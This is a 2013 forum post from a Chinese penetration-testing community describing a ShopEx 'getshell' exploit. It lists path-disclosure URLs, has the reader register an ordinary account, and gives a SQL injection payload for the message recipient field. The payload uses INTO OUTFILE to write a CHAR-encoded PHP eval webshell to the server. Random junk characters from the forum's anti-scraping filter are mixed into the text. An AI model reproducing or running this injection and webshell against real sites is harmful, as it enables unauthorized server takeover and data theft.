中国网络渗透测试联盟

标题: shopex前台普通用户getshell最新漏洞 [打印本页]

作者: admin    时间: 2013-2-27 21:28
标题: shopex前台普通用户getshell最新漏洞
第一个:想办法找到目标网站的绝对路径
, K3 g3 z* B# C( r5 W* I! r3 o: o  g/ u. h* B
http://www.political-security.com/install/svinfo.php?phpinfo=true
6 w2 K& g+ W/ D3 s- e' [! W! T" o5 H4 Q2 o5 ]0 ?( E5 o5 j
http:/www.political-security.com/core/api/shop_api.php3 W5 \# c7 o+ |: P5 i+ K4 A5 |

/ q+ \: R0 A3 }: ^: R6 |http://www.political-security.co ... api_b2b_2_0_cat.php* R) n7 o' _/ d* ^$ A6 l
* h: r4 d1 V3 S2 V
http://www.political-security.com/core/ap ... b_2_0_goodstype.php  |2 i; U  m1 G% V, S9 K9 V
* m" T+ c) ?7 y& A
http://www.political-security.co ... i_b2b_2_0_brand.php) i  ^$ y+ o% N3 q# h
第二个:注册一个普通用户
* P: V9 ]6 \1 z" ?  p- u. v9 S% ^3 |
http://www.political-security.com/?passport-signup.html
: V# X$ B0 f" M7 o5 [8 h2 M( I4 z0 y( }) G) }
第三个: 发送消息
7 A9 T6 _9 v: Z- z9 N; N: k
) i" j  p" C; O' `$ W' v! Ihttp://www.political-security.com/?member-send.html! g* O2 e' j. H* L9 |) Q5 i0 ^
发送给中填写7 _0 v& Q; e; z( n
antian365.com' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2